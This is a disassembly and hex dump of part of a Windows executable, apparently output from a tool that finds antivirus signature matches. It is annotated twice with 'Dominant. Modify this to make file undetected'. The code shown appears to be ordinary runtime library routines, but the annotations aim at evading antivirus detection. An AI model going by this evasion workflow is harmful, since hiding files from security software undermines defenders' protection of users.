0x68f7: ; CALL XREF from fcn.004074f7 @ +0xe0(x)
0x68f7: 180: fcn.004074f7 ();
0x68f7: 0x004074f7 8bff mov edi, edi
0x68f9: 0x004074f9 53 push ebx
0x68fa: 0x004074fa 56 push esi
0x68fb: 0x004074fb 57 push edi
0x68fc: 0x004074fc 33ff xor edi, edi
0x68fe: ; CODE XREF from fcn.004074f7 @ 0x4075a1(x)
0x68fe: > 0x004074fe 8bc7 mov eax, edi
0x6900: 0x00407500 8bcf mov ecx, edi
0x6902: 0x00407502 83e03f and eax, 0x3f ; 63
0x6905: 0x00407505 c1f906 sar ecx, 6
0x6908: 0x00407508 6bf038 imul esi, eax, 0x38
0x690b: 0x0040750b 03348d20b041. add esi, dword [ecx*4 + 0x41b020]
0x6912: 0x00407512 837e18ff cmp dword [esi + 0x18], 0xffffffff
0x6916: < 0x00407516 740c je 0x407524
0x6918: 0x00407518 837e18fe cmp dword [esi + 0x18], 0xfffffffe
0x691c: < 0x0040751c 7406 je 0x407524
0x691e: 0x0040751e 804e2880 or byte [esi + 0x28], 0x80 ; [0x80:1]=255 ; 128
0x6922: < 0x00407522 eb79 jmp 0x40759d
0x6924: ; CODE XREFS from fcn.004074f7 @ 0x407516(x), 0x40751c(x)
0x6924: > 0x00407524 8bc7 mov eax, edi
0x6926: 0x00407526 c6462881 mov byte [esi + 0x28], 0x81 ; [0x81:1]=255 ; 129
0x692a: 0x0040752a 83e800 sub eax, 0
0x692d: < 0x0040752d 7410 je 0x40753f
0x692f: 0x0040752f 83e801 sub eax, 1
0x6932: < 0x00407532 7407 je 0x40753b
0x6934: 0x00407534 83e801 sub eax, 1
0x6937: 0x00407537 6af4 push 0xfffffffffffffff4
0x6939: < 0x00407539 eb06 jmp 0x407541
0x693b: ; CODE XREF from fcn.004074f7 @ 0x407532(x)
0x693b: > 0x0040753b 6af5 push 0xfffffffffffffff5
0x693d: < 0x0040753d eb02 jmp 0x407541
0x693f: ; CODE XREF from fcn.004074f7 @ 0x40752d(x)
0x693f: > 0x0040753f 6af6 push 0xfffffffffffffff6
0x6941: ; CODE XREFS from fcn.004074f7 @ 0x407539(x), 0x40753d(x)
0x6941: > 0x00407541 58 pop eax
0x6942: 0x00407542 50 push eax ; DWORD nStdHandle
0x6943: 0x00407543 ff1580204100 call dword [sym.imp.KERNEL32.dll_GetStdHandle] ; 0x412080 ; HANDLE GetStdHandle(DWORD nStdHandle)
0x6949: 0x00407549 8bd8 mov ebx, eax
0x694b: 0x0040754b 83fbff cmp ebx, 0xffffffff
0x694e: < 0x0040754e 740d je 0x40755d
0x6950: 0x00407550 85db test ebx, ebx
0x6952: < 0x00407552 7409 je 0x40755d
0x6954: 0x00407554 53 push ebx ; HANDLE hFile
0x6955: 0x00407555 ff15ac204100 call dword [sym.imp.KERNEL32.dll_GetFileType] ; 0x4120ac ; DWORD GetFileType(HANDLE hFile)
0x695b: < 0x0040755b eb02 jmp 0x40755f
0x695d: ; CODE XREFS from fcn.004074f7 @ 0x40754e(x), 0x407552(x)
0x695d: > 0x0040755d 33c0 xor eax, eax
0x695f: ; CODE XREF from fcn.004074f7 @ 0x40755b(x)
0x695f: > 0x0040755f 85c0 test eax, eax
0x6961: < 0x00407561 741c je 0x40757f
0x6963: 0x00407563 0fb6c0 movzx eax, al
0x6966: 0x00407566 895e18 mov dword [esi + 0x18], ebx
0x6969: 0x00407569 83f802 cmp eax, 2 ; 2
0x696c: < 0x0040756c 7506 jne 0x407574
0x696e: 0x0040756e 804e2840 or byte [esi + 0x28], 0x40 ; [0x40:1]=255 ; 64
0x6972: < 0x00407572 eb29 jmp 0x40759d
0x6974: ; CODE XREF from fcn.004074f7 @ 0x40756c(x)
0x6974: > 0x00407574 83f803 cmp eax, 3 ; 3
0x6977: < 0x00407577 7524 jne 0x40759d
0x6979: 0x00407579 804e2808 or byte [esi + 0x28], 8
0x697d: < 0x0040757d eb1e jmp 0x40759d
0x697f: ; CODE XREF from fcn.004074f7 @ 0x407561(x)
0x697f: > 0x0040757f 804e2840 or byte [esi + 0x28], 0x40 ; [0x40:1]=255 ; 64
0x6983: 0x00407583 c74618feffff. mov dword [esi + 0x18], 0xfffffffe ; [0xfffffffe:4]=-1 ; 4294967294
0x698a: 0x0040758a a1ccac4100 mov eax, dword [0x41accc] ; [0x41accc:4]=0
0x698f: 0x0040758f 85c0 test eax, eax
0x6991: < 0x00407591 740a je 0x40759d
0x6993: 0x00407593 8b04b8 mov eax, dword [eax + edi*4]
0x6996: 0x00407596 c74010feffff. mov dword [eax + 0x10], 0xfffffffe ; [0xfffffffe:4]=-1 ; 4294967294
0x699d: ; CODE XREFS from fcn.004074f7 @ 0x407522(x), 0x407572(x), 0x407577(x), 0x40757d(x), 0x407591(x)
0x699d: > 0x0040759d 47 inc edi
0x699e: 0x0040759e 83ff03 cmp edi, 3 ; 3
0x69a1: < 0x004075a1 0f8557ffffff jne 0x4074fe
0x69a7: 0x004075a7 5f pop edi
0x69a8: 0x004075a8 5e pop esi
0x69a9: 0x004075a9 5b pop ebx
0x69aa: 0x004075aa c3 ret
0x69ab: 0x004075ab 6a0c push 0xc ; 12
0x69ad: 0x004075ad 68a8904100 push 0x4190a8
0x69b2: 0x004075b2 e839aaffff call fcn.00401ff0
0x69b7: 0x004075b7 6a07 push 7 ; 7
0x69b9: 0x004075b9 e82e2d0000 call fcn.0040a2ec
0x69be: 0x004075be 59 pop ecx
0x69bf: 0x004075bf 33db xor ebx, ebx
0x69c1: 0x004075c1 885de7 mov byte [ebp - 0x19], bl
0x69c4: 0x004075c4 895dfc mov dword [ebp - 4], ebx
0x69c7: 0x004075c7 53 push ebx
0x69c8: 0x004075c8 e85f2e0000 call fcn.0040a42c
0x69cd: 0x004075cd 59 pop ecx
0x69ce: 0x004075ce 85c0 test eax, eax
0x69d0: < 0x004075d0 750f jne 0x4075e1
0x69d2: 0x004075d2 e86afeffff call fcn.00407441
0x69d7: 0x004075d7 e81bffffff call fcn.004074f7
0x69dc: 0x004075dc b301 mov bl, 1
0x69de: 0x004075de 885de7 mov byte [ebp - 0x19], bl
0x69e1: ; CODE XREF from fcn.004074f7 @ +0xd9(x)
0x69e1: > 0x004075e1 c745fcfeffff. mov dword [ebp - 4], 0xfffffffe ; 4294967294
0x69e8: 0x004075e8 e815000000 call fcn.00407602
0x69ed: 0x004075ed 8ac3 mov al, bl
0x69ef: 0x004075ef 8b4df0 mov ecx, dword [ebp - 0x10]
0x69f2: 0x004075f2 64890d000000. mov dword fs:[0], ecx
0x69f9: 0x004075f9 59 pop ecx
0x69fa: 0x004075fa 5f pop edi
0x69fb: 0x004075fb 5e pop esi
0x69fc: 0x004075fc 5b pop ebx
0x69fd: 0x004075fd c9 leave
0x69fe: 0x004075fe c3 ret
0x69ff: 0x004075ff 8a5de7 mov bl, byte [ebp - 0x19]
0x6a02: ; CALL XREF from fcn.004074f7 @ +0xf1(x)
0x6a02: 9: fcn.00407602 ();
0x6a02: 0x00407602 6a07 push 7 ; 7
0x6a04: 0x00407604 e82b2d0000 call fcn.0040a334
0x6a09: 0x00407609 59 pop ecx
0x6a0a: 0x0040760a c3 ret
0x6a0b: 0x0040760b 8bff mov edi, edi
0x6a0d: 0x0040760d 56 push esi
0x6a0e: 0x0040760e 33f6 xor esi, esi
0x6a10: ; CODE XREF from fcn.00407602 @ +0x2f(x)
0x6a10: > 0x00407610 8b8620b04100 mov eax, dword [esi + 0x41b020]
0x6a16: 0x00407616 85c0 test eax, eax
0x6a18: < 0x00407618 740e je 0x407628
0x6a1a: 0x0040761a 50 push eax
0x6a1b: 0x0040761b e8d72d0000 call fcn.0040a3f7
0x6a20: 0x00407620 83a620b04100. and dword [esi + 0x41b020], 0
0x6a27: 0x00407627 59 pop ecx
0x6a28: ; CODE XREF from fcn.00407602 @ +0x16(x)
0x6a28: > 0x00407628 83c604 add esi, 4
0x6a2b: 0x0040762b 81fe00020000 cmp esi, 0x200 ; 512
0x6a31: < 0x00407631 72dd jb 0x407610
0x6a33: 0x00407633 b001 mov al, 1
0x6a35: 0x00407635 5e pop esi
0x6a36: 0x00407636 c3 ret
0x6a37: ; XREFS: CALL 0x004034e5 CALL 0x00403563 CODE 0x00404f88
0x6a37: ; XREFS: CALL 0x00408ea6 CALL 0x00409918 CALL 0x00409ef0
0x6a37: ; XREFS: CALL 0x0040a99d CALL 0x0040eca8 CALL 0x0040ed6e
0x6a37: ; XREFS: CALL 0x0040f011
0x6a37: 78: fcn.00407637 (int32_t arg_8h);
0x6a37: ; arg int32_t arg_8h @ ebp+0x8
0x6a37: 0x00407637 8bff mov edi, edi
0x6a39: 0x00407639 55 push ebp
0x6a3a: 0x0040763a 8bec mov ebp, esp
0x6a3c: 0x0040763c 56 push esi
0x6a3d: 0x0040763d 8b7508 mov esi, dword [arg_8h]
0x6a40: 0x00407640 83fee0 cmp esi, 0xffffffe0
0x6a43: < 0x00407643 7730 ja 0x407675
0x6a45: 0x00407645 85f6 test esi, esi
0x6a47: < 0x00407647 7517 jne 0x407660
0x6a49: 0x00407649 46 inc esi
0x6a4a: < 0x0040764a eb14 jmp 0x407660
0x6a4c: ; CODE XREF from fcn.00407637 @ 0x407671(x)
0x6a4c: > 0x0040764c e8c3e5ffff call fcn.00405c14
0x6a51: 0x00407651 85c0 test eax, eax
0x6a53: < 0x00407653 7420 je 0x407675
0x6a55: 0x00407655 56 push esi
0x6a56: 0x00407656 e8a8380000 call fcn.0040af03
0x6a5b: 0x0040765b 59 pop ecx
0x6a5c: 0x0040765c 85c0 test eax, eax
0x6a5e: < 0x0040765e 7415 je 0x407675
0x6a60: ; CODE XREFS from fcn.00407637 @ 0x407647(x), 0x40764a(x)
0x6a60: > 0x00407660 56 push esi
0x6a61: 0x00407661 6a00 push 0 ; DWORD dwFlags
0x6a63: 0x00407663 ff35b0b34100 push dword [0x41b3b0] ; HANDLE hHeap
0x6a69: 0x00407669 ff159c204100 call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; 0x41209c ; LPVOID HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
0x6a6f: 0x0040766f 85c0 test eax, eax
0x6a71: < 0x00407671 74d9 je 0x40764c
0x6a73: < 0x00407673 eb0d jmp 0x407682
0x6a75: ; CODE XREFS from fcn.00407637 @ 0x407643(x), 0x407653(x), 0x40765e(x)
0x6a75: > 0x00407675 e831f5ffff call fcn.00406bab
0x6a7a: 0x0040767a c7000c000000 mov dword [eax], 0xc ; [0xc:4]=-1 ; 12
0x6a80: 0x00407680 33c0 xor eax, eax
0x6a82: ; CODE XREF from fcn.00407637 @ 0x407673(x)
0x6a82: > 0x00407682 5e pop esi
0x6a83: 0x00407683 5d pop ebp
0x6a84: 0x00407684 c3 ret
0x6a85: ; CALL XREF from fcn.004076a0 @ 0x4076b6(x)
0x6a85: 27: fcn.00407685 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h);
0x6a85: ; arg int32_t arg_8h @ ebp+0x8
0x6a85: ; arg int32_t arg_ch @ ebp+0xc
0x6a85: ; arg int32_t arg_10h @ ebp+0x10
0x6a85: 0x00407685 8bff mov edi, edi
0x6a87: 0x00407687 55 push ebp
0x6a88: 0x00407688 8bec mov ebp, esp
0x6a8a: 0x0040768a 8b4508 mov eax, dword [arg_8h]
0x6a8d: 0x0040768d 8b4d10 mov ecx, dword [arg_10h]
0x6a90: 0x00407690 8b550c mov edx, dword [arg_ch]
0x6a93: 0x00407693 8910 mov dword [eax], edx
0x6a95: 0x00407695 894804 mov dword [eax + 4], ecx

Match 48: 27680 (size: 408)

Dominant. Modify this to make file undetected

.text

00006C20   FF 83 C4 10 5D C3 8B FF 55 8B EC 83 EC 18 57 8B    ....]...U.....W.
00006C30   7D 0C 85 FF 75 15 39 7D 10 76 10 8B 45 08 85 C0    }...u.9}.v..E...
00006C40   74 02 21 38 33 C0 E9 BA 00 00 00 53 8B 5D 08 85    t.!83......S.]..
00006C50   DB 74 03 83 0B FF 81 7D 10 FF FF FF 7F 56 76 14    .t.....}.....Vv.
00006C60   E8 46 F3 FF FF 6A 16 5E 89 30 E8 7F F2 FF FF E9    .F...j.^.0......
00006C70   8D 00 00 00 FF 75 18 8D 4D E8 E8 A7 BF FF FF 8B    .....u..M.......
00006C80   45 EC 33 F6 8B 48 08 81 F9 E9 FD 00 00 75 2C 8D    E.3..H.......u,.
00006C90   45 F8 89 75 F8 50 0F B7 45 14 50 57 89 75 FC E8    E..u.P..E.PW.u..
00006CA0   FB 4D 00 00 83 C4 0C 85 DB 74 02 89 03 83 F8 04    .M.......t......
00006CB0   7E 3F E8 F4 F2 FF FF 8B 30 EB 36 39 B0 A8 00 00    ~?......0.69....
00006CC0   00 75 5C 66 8B 45 14 B9 FF 00 00 00 66 3B C1 76    .u\f.E......f;.v
00006CD0   37 85 FF 74 12 39 75 10 76 0D FF 75 10 56 57 E8    7..t.9u.v..u.VW.
00006CE0   2C AC FF FF 83 C4 0C E8 BF F2 FF FF 6A 2A 5E 89    ,...........j*^.
00006CF0   30 80 7D F4 00 74 0A 8B 4D E8 83 A1 50 03 00 00    0.}..t..M...P...
00006D00   FD 8B C6 5E 5B 5F C9 C3 85 FF 74 07 39 75 10 76    ...^[_....t.9u.v
00006D10   5C 88 07 85 DB 74 DA C7 03 01 00 00 00 EB D2 8D    \....t..........
00006D20   45 FC 89 75 FC 50 56 FF 75 10 8D 45 14 57 6A 01    E..u.PV.u..E.Wj.
00006D30   50 56 51 E8 A7 24 00 00 83 C4 20 85 C0 74 0D 39    PVQ..$.... ..t.9
00006D40   75 FC 75 A3 85 DB 74 A9 89 03 EB A5 FF 15 48 20    u.u...t.......H 
00006D50   41 00 83 F8 7A 75 90 85 FF 74 12 39 75 10 76 0D    A...zu...t.9u.v.
00006D60   FF 75 10 56 57 E8 A6 AB FF FF 83 C4 0C E8 39 F2    .u.VW.........9.
00006D70   FF FF 6A 22 5E 89 30 E8 72 F1 FF FF E9 70 FF FF    ..j"^.0.r....p..
00006D80   FF 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75    ...U..j..u..u..u
00006D90   0C FF 75 08 E8 8D FE FF FF 83 C4 14 5D C3 8B FF    ..u.........]...
00006DA0   55 8B EC A1 18 AC 41 00 56 57 83 F8 05 0F 8C B7    U.....A.VW......
00006DB0   00 00 00 8B 4D 08 F6 C1                            ....M...

0x6c11: 0x00407811 6a00 push 0
0x6c13: 0x00407813 ff7510 push dword [arg_10h]
0x6c16: 0x00407816 ff750c push dword [arg_ch]
0x6c19: 0x00407819 ff7508 push dword [arg_8h]
0x6c1c: 0x0040781c e8a9feffff call fcn.004076ca
0x6c21: 0x00407821 83c410 add esp, 0x10
0x6c24: 0x00407824 5d pop ebp
0x6c25: 0x00407825 c3 ret
0x6c26: ; CALL XREF from fcn.00407981 @ 0x407994(x)
0x6c26: 347: fcn.00407826 (int32_t arg_8h, int32_t arg_ch, uint32_t arg_10h, int32_t arg_14h, int32_t arg_18h);
0x6c26: ; arg int32_t arg_8h @ ebp+0x8
0x6c26: ; arg int32_t arg_ch @ ebp+0xc
0x6c26: ; arg uint32_t arg_10h @ ebp+0x10
0x6c26: ; arg int32_t arg_14h @ ebp+0x14
0x6c26: ; arg int32_t arg_18h @ ebp+0x18
0x6c26: ; var uint32_t var_4h @ ebp-0x4
0x6c26: ; var int32_t var_8h @ ebp-0x8
0x6c26: ; var uint32_t var_ch @ ebp-0xc
0x6c26: ; var int32_t var_14h @ ebp-0x14
0x6c26: ; var int32_t var_18h @ ebp-0x18
0x6c26: 0x00407826 8bff mov edi, edi
0x6c28: 0x00407828 55 push ebp
0x6c29: 0x00407829 8bec mov ebp, esp
0x6c2b: 0x0040782b 83ec18 sub esp, 0x18
0x6c2e: 0x0040782e 57 push edi
0x6c2f: 0x0040782f 8b7d0c mov edi, dword [arg_ch]
0x6c32: 0x00407832 85ff test edi, edi
0x6c34: < 0x00407834 7515 jne 0x40784b
0x6c36: 0x00407836 397d10 cmp dword [arg_10h], edi
0x6c39: < 0x00407839 7610 jbe 0x40784b
0x6c3b: 0x0040783b 8b4508 mov eax, dword [arg_8h]
0x6c3e: 0x0040783e 85c0 test eax, eax
0x6c40: < 0x00407840 7402 je 0x407844
0x6c42: 0x00407842 2138 and dword [eax], edi
0x6c44: ; CODE XREF from fcn.00407826 @ 0x407840(x)
0x6c44: > 0x00407844 33c0 xor eax, eax
0x6c46: < 0x00407846 e9ba000000 jmp 0x407905
0x6c4b: ; CODE XREFS from fcn.00407826 @ 0x407834(x), 0x407839(x)
0x6c4b: > 0x0040784b 53 push ebx
0x6c4c: 0x0040784c 8b5d08 mov ebx, dword [arg_8h]
0x6c4f: 0x0040784f 85db test ebx, ebx
0x6c51: < 0x00407851 7403 je 0x407856
0x6c53: 0x00407853 830bff or dword [ebx], 0xffffffff ; [0xffffffff:4]=-1 ; -1
0x6c56: ; CODE XREF from fcn.00407826 @ 0x407851(x)
0x6c56: > 0x00407856 817d10ffffff. cmp dword [arg_10h], 0x7fffffff
0x6c5d: 0x0040785d 56 push esi
0x6c5e: < 0x0040785e 7614 jbe 0x407874
0x6c60: 0x00407860 e846f3ffff call fcn.00406bab
0x6c65: 0x00407865 6a16 push 0x16 ; 22
0x6c67: 0x00407867 5e pop esi
0x6c68: 0x00407868 8930 mov dword [eax], esi
0x6c6a: 0x0040786a e87ff2ffff call fcn.00406aee
0x6c6f: < 0x0040786f e98d000000 jmp 0x407901
0x6c74: ; CODE XREF from fcn.00407826 @ 0x40785e(x)
0x6c74: > 0x00407874 ff7518 push dword [arg_18h]
0x6c77: 0x00407877 8d4de8 lea ecx, [var_18h]
0x6c7a: 0x0040787a e8a7bfffff call fcn.00403826
0x6c7f: 0x0040787f 8b45ec mov eax, dword [var_14h]
0x6c82: 0x00407882 33f6 xor esi, esi
0x6c84: 0x00407884 8b4808 mov ecx, dword [eax + 8]
0x6c87: 0x00407887 81f9e9fd0000 cmp ecx, 0xfde9
0x6c8d: < 0x0040788d 752c jne 0x4078bb
0x6c8f: 0x0040788f 8d45f8 lea eax, [var_8h]
0x6c92: 0x00407892 8975f8 mov dword [var_8h], esi
0x6c95: 0x00407895 50 push eax
0x6c96: 0x00407896 0fb74514 movzx eax, word [arg_14h]
0x6c9a: 0x0040789a 50 push eax
0x6c9b: 0x0040789b 57 push edi
0x6c9c: 0x0040789c 8975fc mov dword [var_4h], esi
0x6c9f: 0x0040789f e8fb4d0000 call fcn.0040c69f
0x6ca4: 0x004078a4 83c40c add esp, 0xc
0x6ca7: 0x004078a7 85db test ebx, ebx
0x6ca9: < 0x004078a9 7402 je 0x4078ad
0x6cab: 0x004078ab 8903 mov dword [ebx], eax
0x6cad: ; CODE XREF from fcn.00407826 @ 0x4078a9(x)
0x6cad: > 0x004078ad 83f804 cmp eax, 4 ; 4
0x6cb0: < 0x004078b0 7e3f jle 0x4078f1
0x6cb2: 0x004078b2 e8f4f2ffff call fcn.00406bab
0x6cb7: 0x004078b7 8b30 mov esi, dword [eax]
0x6cb9: < 0x004078b9 eb36 jmp 0x4078f1
0x6cbb: ; CODE XREF from fcn.00407826 @ 0x40788d(x)
0x6cbb: > 0x004078bb 39b0a8000000 cmp dword [eax + 0xa8], esi
0x6cc1: < 0x004078c1 755c jne 0x40791f
0x6cc3: 0x004078c3 668b4514 mov ax, word [arg_14h]
0x6cc7: 0x004078c7 b9ff000000 mov ecx, 0xff ; 255
0x6ccc: 0x004078cc 663bc1 cmp ax, cx
0x6ccf: < 0x004078cf 7637 jbe 0x407908
0x6cd1: 0x004078d1 85ff test edi, edi
0x6cd3: < 0x004078d3 7412 je 0x4078e7
0x6cd5: 0x004078d5 397510 cmp dword [arg_10h], esi
0x6cd8: < 0x004078d8 760d jbe 0x4078e7
0x6cda: 0x004078da ff7510 push dword [arg_10h]
0x6cdd: 0x004078dd 56 push esi
0x6cde: 0x004078de 57 push edi
0x6cdf: 0x004078df e82cacffff call fcn.00402510
0x6ce4: 0x004078e4 83c40c add esp, 0xc
0x6ce7: ; CODE XREFS from fcn.00407826 @ 0x4078d3(x), 0x4078d8(x), 0x407942(x), 0x407955(x)
0x6ce7: > 0x004078e7 e8bff2ffff call fcn.00406bab
0x6cec: 0x004078ec 6a2a push 0x2a ; '*' ; 42
0x6cee: 0x004078ee 5e pop esi
0x6cef: 0x004078ef 8930 mov dword [eax], esi
0x6cf1: ; XREFS: CODE 0x004078b0 CODE 0x004078b9 CODE 0x00407915
0x6cf1: ; XREFS: CODE 0x0040791d CODE 0x00407946 CODE 0x0040794a
0x6cf1: ; XREFS: CODE 0x0040797c
0x6cf1: > 0x004078f1 807df400 cmp byte [var_ch], 0
0x6cf5: < 0x004078f5 740a je 0x407901
0x6cf7: 0x004078f7 8b4de8 mov ecx, dword [var_18h]
0x6cfa: 0x004078fa 83a150030000. and dword [ecx + 0x350], 0xfffffffd ; [0xfffffffd:4]=-1 ; 4294967293
0x6d01: ; CODE XREFS from fcn.00407826 @ 0x40786f(x), 0x4078f5(x)
0x6d01: > 0x00407901 8bc6 mov eax, esi
0x6d03: 0x00407903 5e pop esi
0x6d04: 0x00407904 5b pop ebx
0x6d05: ; CODE XREF from fcn.00407826 @ 0x407846(x)
0x6d05: > 0x00407905 5f pop edi
0x6d06: 0x00407906 c9 leave
0x6d07: 0x00407907 c3 ret
0x6d08: ; CODE XREF from fcn.00407826 @ 0x4078cf(x)
0x6d08: > 0x00407908 85ff test edi, edi
0x6d0a: < 0x0040790a 7407 je 0x407913
0x6d0c: 0x0040790c 397510 cmp dword [arg_10h], esi
0x6d0f: < 0x0040790f 765c jbe 0x40796d
0x6d11: 0x00407911 8807 mov byte [edi], al
0x6d13: ; CODE XREF from fcn.00407826 @ 0x40790a(x)
0x6d13: > 0x00407913 85db test ebx, ebx
0x6d15: < 0x00407915 74da je 0x4078f1
0x6d17: 0x00407917 c70301000000 mov dword [ebx], 1
0x6d1d: < 0x0040791d ebd2 jmp 0x4078f1
0x6d1f: ; CODE XREF from fcn.00407826 @ 0x4078c1(x)
0x6d1f: > 0x0040791f 8d45fc lea eax, [var_4h]
0x6d22: 0x00407922 8975fc mov dword [var_4h], esi
0x6d25: 0x00407925 50 push eax
0x6d26: 0x00407926 56 push esi
0x6d27: 0x00407927 ff7510 push dword [arg_10h]
0x6d2a: 0x0040792a 8d4514 lea eax, [arg_14h]
0x6d2d: 0x0040792d 57 push edi
0x6d2e: 0x0040792e 6a01 push 1 ; 1
0x6d30: 0x00407930 50 push eax
0x6d31: 0x00407931 56 push esi
0x6d32: 0x00407932 51 push ecx
0x6d33: 0x00407933 e8a7240000 call fcn.00409ddf
0x6d38: 0x00407938 83c420 add esp, 0x20
0x6d3b: 0x0040793b 85c0 test eax, eax
0x6d3d: < 0x0040793d 740d je 0x40794c
0x6d3f: 0x0040793f 3975fc cmp dword [var_4h], esi
0x6d42: < 0x00407942 75a3 jne 0x4078e7
0x6d44: 0x00407944 85db test ebx, ebx
0x6d46: < 0x00407946 74a9 je 0x4078f1
0x6d48: 0x00407948 8903 mov dword [ebx], eax
0x6d4a: < 0x0040794a eba5 jmp 0x4078f1
0x6d4c: ; CODE XREF from fcn.00407826 @ 0x40793d(x)
0x6d4c: > 0x0040794c ff1548204100 call dword [sym.imp.KERNEL32.dll_GetLastError] ; 0x412048 ; DWORD GetLastError(void)
0x6d52: 0x00407952 83f87a cmp eax, 0x7a ; 'z' ; 122
0x6d55: < 0x00407955 7590 jne 0x4078e7
0x6d57: 0x00407957 85ff test edi, edi
0x6d59: < 0x00407959 7412 je 0x40796d
0x6d5b: 0x0040795b 397510 cmp dword [arg_10h], esi
0x6d5e: < 0x0040795e 760d jbe 0x40796d
0x6d60: 0x00407960 ff7510 push dword [arg_10h]
0x6d63: 0x00407963 56 push esi
0x6d64: 0x00407964 57 push edi
0x6d65: 0x00407965 e8a6abffff call fcn.00402510
0x6d6a: 0x0040796a 83c40c add esp, 0xc
0x6d6d: ; CODE XREFS from fcn.00407826 @ 0x40790f(x), 0x407959(x), 0x40795e(x)
0x6d6d: > 0x0040796d e839f2ffff call fcn.00406bab
0x6d72: 0x00407972 6a22 push 0x22 ; '\"' ; 34
0x6d74: 0x00407974 5e pop esi
0x6d75: 0x00407975 8930 mov dword [eax], esi
0x6d77: 0x00407977 e872f1ffff call fcn.00406aee
0x6d7c: < 0x0040797c e970ffffff jmp 0x4078f1
0x6d81: ; CALL XREF from fcn.00408c77 @ 0x408d4d(x)
0x6d81: 29: fcn.00407981 (int32_t arg_8h, int32_t arg_ch, int32_t arg_10h, int32_t arg_14h);
0x6d81: ; arg int32_t arg_8h @ ebp+0x8
0x6d81: ; arg int32_t arg_ch @ ebp+0xc
0x6d81: ; arg int32_t arg_10h @ ebp+0x10
0x6d81: ; arg int32_t arg_14h @ ebp+0x14
0x6d81: 0x00407981 8bff mov edi, edi
0x6d83: 0x00407983 55 push ebp
0x6d84: 0x00407984 8bec mov ebp, esp
0x6d86: 0x00407986 6a00 push 0
0x6d88: 0x00407988 ff7514 push dword [arg_14h]
0x6d8b: 0x0040798b ff7510 push dword [arg_10h]
0x6d8e: 0x0040798e ff750c push dword [arg_ch]
0x6d91: 0x00407991 ff7508 push dword [arg_8h]
0x6d94: 0x00407994 e88dfeffff call fcn.00407826
0x6d99: 0x00407999 83c414 add esp, 0x14
0x6d9c: 0x0040799c 5d pop ebp
0x6d9d: 0x0040799d c3 ret
0x6d9e: ; CALL XREF from fcn.00404af3 @ 0x404b3f(x)
0x6d9e: ; CALL XREFS from fcn.0041006b @ 0x41007c(x), 0x410090(x)
0x6d9e: 432: fcn.0040799e (int32_t arg_8h, int32_t arg_ch);
0x6d9e: ; arg int32_t arg_8h @ ebp+0x8
0x6d9e: ; arg int32_t arg_ch @ ebp+0xc
0x6d9e: 0x0040799e 8bff mov edi, edi
0x6da0: 0x004079a0 55 push ebp
0x6da1: 0x004079a1 8bec mov ebp, esp
0x6da3: 0x004079a3 a118ac4100 mov eax, dword [0x41ac18] ; [0x41ac18:4]=0
0x6da8: 0x004079a8 56 push esi
0x6da9: 0x004079a9 57 push edi
0x6daa: 0x004079aa 83f805 cmp eax, 5 ; 5
0x6dad: < 0x004079ad 0f8cb7000000 jl 0x407a6a
0x6db3: 0x004079b3 8b4d08 mov ecx, dword [arg_8h]
0x6db6: 0x004079b6 f6c101 test cl, 1 ; 1
0x6db9: < 0x004079b9 7421 je 0x4079dc
0x6dbb: 0x004079bb 8b450c mov eax, dword [arg_ch]
0x6dbe: 0x004079be 8bf1 mov esi, ecx
0x6dc0: 0x004079c0 8d1441 lea edx, [ecx + eax*2]
0x6dc3: 0x004079c3 3bf2 cmp esi, edx
0x6dc5: < 0x004079c5 740e je 0x4079d5
0x6dc7: 0x004079c7 33 invalid

Match 49: 28360 (size: 272)

Dominant. Modify this to make file undetected

.text

00006EC8   0C 66 39 01 74 07 83 C1 02 3B CF 75 F4 2B CE D1    .f9.t....;.u.+..
00006ED8   F9 3B CA 75 6B 8B 45 0C 8D 3C 4E 2B C2 0F 57 C9    .;.uk.E..<N+..W.
00006EE8   83 E0 F0 03 C1 8D 0C 46 EB 12 0F 10 07 66 0F 75    .......F.....f.u
00006EF8   C1 66 0F D7 C0 85 C0 75 07 83 C7 10 3B F9 75 EA    .f.....u....;.u.
00006F08   8B 45 0C 8D 0C 46 3B F9 74 0E 33 C0 66 39 07 74    .E...F;.t.3.f9.t
00006F18   07 83 C7 02 3B F9 75 F4 8B CF E9 AE FE FF FF 8B    ....;.u.........
00006F28   55 08 8B CA 8B 45 0C 8D 34 42 3B D6 74 0E 33 C0    U....E..4B;.t.3.
00006F38   66 39 01 74 07 83 C1 02 3B CE 75 F4 2B CA D1 F9    f9.t....;.u.+...
00006F48   5F 8B C1 5E 5D C3 6A 08 68 C8 90 41 00 E8 96 A4    _..^].j.h..A....
00006F58   FF FF 8B 45 08 FF 30 E8 88 27 00 00 59 83 65 FC    ...E..0..'..Y.e.
00006F68   00 8B 45 0C 8B 00 8B 00 8B 40 48 F0 FF 00 C7 45    ..E......@H....E
00006F78   FC FE FF FF FF E8 12 00 00 00 8B 4D F0 64 89 0D    ...........M.d..
00006F88   00 00 00 00 59 5F 5E 5B C9 C2 0C 00 8B 45 10 FF    ....Y_^[.....E..
00006F98   30 E8 96 27 00 00 59 C3 6A 08 68 08 91 41 00 E8    0..'..Y.j.h..A..
00006FA8   44 A4 FF FF 8B 45 08 FF 30 E8 36 27 00 00 59 83    D....E..0.6'..Y.
00006FB8   65 FC 00 8B 45 0C 8B 00 8B 00 8B 48 48 85 C9 74    e...E......HH..t
00006FC8   18 83 C8 FF F0 0F C1 01 75 0F 81 F9 00 A2 41 00    ........u.....A.

0x6eb9: < 0x00407ab9 7302 jae 0x407abd
0x6ebb: 0x00407abb 8bd0 mov edx, eax
0x6ebd: ; CODE XREF from fcn.0040799e @ 0x407ab9(x)
0x6ebd: > 0x00407abd 8b7508 mov esi, dword [arg_8h]
0x6ec0: 0x00407ac0 8d3c51 lea edi, [ecx + edx*2]
0x6ec3: 0x00407ac3 33c0 xor eax, eax
0x6ec5: 0x00407ac5 3bf7 cmp esi, edi
0x6ec7: < 0x00407ac7 740c je 0x407ad5
0x6ec9: ; CODE XREF from fcn.0040799e @ 0x407ad3(x)
0x6ec9: > 0x00407ac9 663901 cmp word [ecx], ax
0x6ecc: < 0x00407acc 7407 je 0x407ad5
0x6ece: 0x00407ace 83c102 add ecx, 2
0x6ed1: 0x00407ad1 3bcf cmp ecx, edi
0x6ed3: < 0x00407ad3 75f4 jne 0x407ac9
0x6ed5: ; CODE XREFS from fcn.0040799e @ 0x407ac7(x), 0x407acc(x)
0x6ed5: > 0x00407ad5 2bce sub ecx, esi
